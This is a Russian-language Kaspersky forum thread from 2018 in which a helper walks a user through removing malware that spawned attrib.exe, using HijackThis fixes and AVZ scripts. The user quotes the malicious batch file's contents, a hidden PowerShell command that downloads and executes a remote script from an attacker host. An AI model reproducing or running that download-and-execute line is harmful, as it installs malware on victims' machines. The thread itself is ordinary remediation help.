Перейти к содержанию
Правила раздела
19 лет клубу! Встречаемся в офисе «Лаборатории Касперского»

attrib.exe , который грузит все шесть ядер до 90%

Евгений Овсянников

Автор Евгений Овсянников
в Помощь в удалении вирусов

 Поделиться

Рекомендуемые сообщения

Евгений Овсянников

Евгений Овсянников

Опубликовано
Опубликовано

проблема та же. третьи сутки бьюсь с attrib.exe , который грузит все шесть ядер до 90%. Из диспетчера выловил, что создаются батники в win/temp
скрипт 8 от AVZ выполнил, архив на сайте загрузил (MD5 карантина: 570C9E77CC4490A57626F8A801CCC5C5)
результат проверки
что делать дальше?

 

Сообщение от модератора Mark D. Pearlstone
Перемещено из темы

 

лог хайджек
штатный NOD32, Kaspersky Virus Removal Tool 2015 и Dr.Web CureIt!. проблему не решили.
SpyHunter тоже не помогает.

AdwCleanerC00.txt

AdwCleanerS00.txt

AdwCleanerS01.txt

hijackthis.log

Ссылка на комментарий
Поделиться на другие сайты
Евгений Овсянников

Евгений Овсянников

Опубликовано
  • Автор
Опубликовано (изменено)

автологер прилагаю

CollectionLog-2018.07.14-11.48.zip

Изменено пользователем Евгений Овсянников
Ссылка на комментарий
Поделиться на другие сайты
regist

regist

Опубликовано
Опубликовано 

C:\Program Files\Common Files\restore_rev.bat

вам знаком?

 

"Пофиксите" в HijackThis:

 

O4 - HKCU\..\RunOnce: [Application Restart #3] = C:\Program Files (x86)\Google\Chrome\Application\chrome.exe --flag-switches-begin --flag-switches-end --restore-last-session -- http://ekaterinburg.hh.ru/vacancy/12482091?&utm_medium=email&utm_source=email&utm_campaign=vacancies_selected&utm_content=2015_01_15&loginkey=Fx3kW6m1kmDDGNw6wdeLzYg1n4CNGIiIgZZs9w75Miba7Bwwbg--
O4-32 - HKLM\..\Run: [AsioReg] = C:\Windows\system32\REGSVR32.exe /S CTASIO.DLL
O4-32 - HKLM\..\Run: [AsioThk32Reg] = C:\Windows\system32\REGSVR32.EXE /S CTASIO.DLL
O9 - Button: HKCU\..\{7558B7E5-7B26-4201-BEDB-00D5FF534523} - Mail.Ru Агент - (no file)
O9 - Tools menu item: HKCU\..\{7558B7E5-7B26-4201-BEDB-00D5FF534523} - Mail.Ru Агент - (no file)
O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - (no file)
O21-32 - HKLM\..\ShellIconOverlayIdentifiers:   MailRuCloudIconOverlay0 - {64A9418A-B6B1-4112-B75C-E61633C9A31F} - (no file)
O21-32 - HKLM\..\ShellIconOverlayIdentifiers:   MailRuCloudIconOverlay1 - {6A2E142B-EA63-433A-AC05-5223CBD26E65} - (no file)
O21-32 - HKLM\..\ShellIconOverlayIdentifiers:   MailRuCloudIconOverlay2 - {6AFCC535-2F12-4F50-9F0A-1CF856CFC95D} - (no file)

 

соберите свежие логи Автологером.

  • Согласен 1
Ссылка на комментарий
Поделиться на другие сайты
Евгений Овсянников

Евгений Овсянников

Опубликовано
  • Автор
Опубликовано (изменено)

вам знаком?

нет

внутри вот это

 

powershell -ExecutionPolicy ByPass -WindowStyle Hidden -Command "iex ((new-object net.webclient).DownloadString('http://77.super-me.online/files/restore_rev.ps1'))"

 

 

"Пофиксите" в HijackThis:

проблема осталась

CollectionLog-2018.07.15-16.34.zip

Изменено пользователем Евгений Овсянников
Ссылка на комментарий
Поделиться на другие сайты
regist

regist

Опубликовано
Опубликовано

Здравствуйте!

Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.

Выполните скрипт в АВЗ (Файл - Выполнить скрипт):
 

begin
 ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
 ClearQuarantineEx(true);
 QuarantineFile('C:\Program Files\Common Files\restore_rev.bat', '');
 DeleteFile('C:\Program Files\Common Files\restore_rev.bat', '64');
 ExecuteFile('schtasks.exe', '/delete /TN "RestoreRevTask" /F', 0, 15000, true);
 CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip');
ExecuteSysClean;
 ExecuteWizard('SCU', 2, 3, true);
RebootWindows(true);
end.

После выполнения скрипта компьютер перезагрузится.

 - Файл quarantine.zip из папки AVZ отправьте по адресу newvirus@kaspersky.com
Полученный ответ сообщите здесь (с указанием номера KLAN)
 
Повторите логи по правилам. Для повторной диагностики запустите снова Autologger.
  • Согласен 1
Ссылка на комментарий
Поделиться на другие сайты
Евгений Овсянников

Евгений Овсянников

Опубликовано
  • Автор
Опубликовано (изменено)

Полученный ответ сообщите здесь (с указанием номера KLAN)

KLAN-8402220766

 

Благодарим за обращение в Антивирусную Лабораторию

 
Присланные вами файлы были проверены в автоматическом режиме.
 
В антивирусных базах информация по присланным вами файлам отсутствует:
restore_rev.bat
 
Файлы переданы на исследование. Если результат исследования изменится, мы дополнительно сообщим вам по электронной почте.
        
Это сообщение сформировано автоматической системой обработки писем. Пожалуйста, не отвечайте на него.
 
Антивирусная Лаборатория, Kaspersky Lab HQ
 
"Ленинградское шоссе 39A/3, Москва, 125212, Russia
Телефон/Факс: + 7 (495) 797 8700 

проблема решена. 

в ДЗ процесса больше нет.

CollectionLog-2018.07.15-18.14.zip

Изменено пользователем Евгений Овсянников
Ссылка на комментарий
Поделиться на другие сайты
regist

regist

Опубликовано
Опубликовано 

AdwCleaner, версия 7.2.1 [20180714]-->"C:\Program Files (x86)\AdwCleaner\unins000.exe"

деинсталируйте, тем более вы скачали левый инсталятор в фейкового сайта.

 

Выполните скрипт в AVZ при наличии доступа в интернет:

 

 

var
LogPath : string;
ScriptPath : string;

begin
 LogPath := GetAVZDirectory + 'log\avz_log.txt';
 if FileExists(LogPath) Then DeleteFile(LogPath);
 ScriptPath := GetAVZDirectory +'ScanVuln.txt';

  if DownloadFile('http://dataforce.ru/~kad/ScanVuln.txt', ScriptPath, 1) then ExecuteScript(ScriptPath) else begin
    if DownloadFile('http://dataforce.ru/~kad/ScanVuln.txt', ScriptPath, 0) then ExecuteScript(ScriptPath) else begin
       ShowMessage('Невозможно загрузить скрипт AVZ для обнаружения наиболее часто используемых уязвимостей!');
       exit;
      end;
  end;
 if FileExists(LogPath) Then ExecuteFile('notepad.exe', LogPath, 1, 0, false)
end.

После его работы, если будут найдены уязвимости, в блокноте откроется файл avz_log.txt со ссылками на обновления системы и критичных к безопасности программ, которые нужно загрузить и установить. В первую очередь это относится к Java Runtime Environment, Adobe Reader и Adobe Flash Player, это программы, уязвимостями в которых наиболее часто пользуются для внедрения зловредов в систему.

 

Выполните рекомендации после лечения.

 

  • Согласен 2
Ссылка на комментарий
Поделиться на другие сайты
Евгений Овсянников

Евгений Овсянников

Опубликовано
  • Автор
Опубликовано

 

 


Выполните скрипт в AVZ при наличии доступа в интернет:

 

Поиск критических уязвимостей

Уязвимость в MSXML делает возможным удаленное выполнение кода
Запускайте обновление от имени Администратора
 
Обновление для системы безопасности Microsoft Office Word 2007
 
Обновление для системы безопасности Microsoft Office Word 2003 Compatibility Pack
 
Обнаружено уязвимостей: 3
 
Ссылка на комментарий
Поделиться на другие сайты

Пожалуйста, войдите, чтобы комментировать

Вы сможете оставить комментарий после входа в



Войти
 Поделиться
Перейти к списку тем

  • Похожий контент

    • Garguha
      [РЕШЕНО] Два dwm.exe процесса один из которых скрытый майнер
      Автор Garguha
      Заметил что в простое происходит сильный нагрев и съедается около 20% процессора. После поисков проблем обнаружил 2 dwm.exe процесса один из которых и берёт на себя нагрузку. После прочтения нескольких статей форума не смог лично разобраться в решении проблемы.
      CollectionLog-2025.07.18-20.40.zip
    • Виталий__-
      Писки и трещания в компьютере, которые передаются в наушники.
      Автор Виталий__-
      Ребят, что делать в данной ситуации? Из-за проблем с перегревом, я решил поменять башню и корпус. Взял se-214-xt и корпус Bloody BD-CC107F. После этого появилась проблема, что в верхнем аудио разъеме при подключении наушников в левом ухе пипец что-то жужжит, только во время игр. (Сразу скажу что с наушниками все нормально, сам порт 20 раз переподключали и проверяли). В салатовом разъёме в самой материнке этот шум есть, но очень тихий и опять же только во время игр. Хочу дополнить что звук не просто белый шум, а какие-то писки и трещания, кстати от самого системника тоже идёт такой звук). Очень похоже на проблему писка дросселей, но все поголовно говорят, что при этой проблеме только сама карта пищит и тд, никакой звук не должен передаваться в наушники. В интернете я находил несколько постов с такой же проблемой, что именно писки и трещания передаются в наушники, но решения у всех были разные. Я честно уже без сил, не знаю что делать.
    • princewithoutcrown
      [РЕШЕНО] второй dwm грузит комп
      Автор princewithoutcrown
      заразился с флешки от другого компа, появился второй dwm, сильно нагружающий комп.
      помогите пожалуйста


      DESKTOP-RPG11VN_2025-05-23_03-22-42_v5.0.RC1.v x64.7z
    • ChanyRi
      Есть ли вирусы которые сразу после выключения включают ПК?
      Автор ChanyRi
      Столкнулся с проблемой, что где то раз в две недели после выключения мой ПК сам включается. Сначало думал дело в блоке питания и заменил его, но через неделю все тоже самое. Проверил саму кнопку включения и настройки BIOS, но это тоже не дало результат. Так же точно знаю, что это не спящий режим или перезагрузка, так как при спящем режиме или перезагрузке кулера не отключаются. Теперь я подозреваю, что это какой то вирус. Есть ли вообще вирус который может включать ПК? Антивирус никаких проблем не видит. Заранее спасибо
    • Morelax
      [РЕШЕНО] Не могу избавиться от вируса CAAServices.exe, который хранится в C:\ProgramData\CAAService
      Автор Morelax
      Добрый день! Заметил в автозагрузках странный процесс CAAServices.exe. Но при удалении он снова восстанавливается. Отключил из автозагрузки, вроде не включается теперь, но всё равно не даёт покоя и хочется избавиться. Подскажите, пожалуйста, как это сделать? Я не особо шарю в этих делах. Смотрел похожие темы, но не особо понял инструкции по устранению вируса. Заранее спасибо. 

      ps/ он автоматически добавляет в исключения в дефендер (последний скрин)



×
×
  • Создать...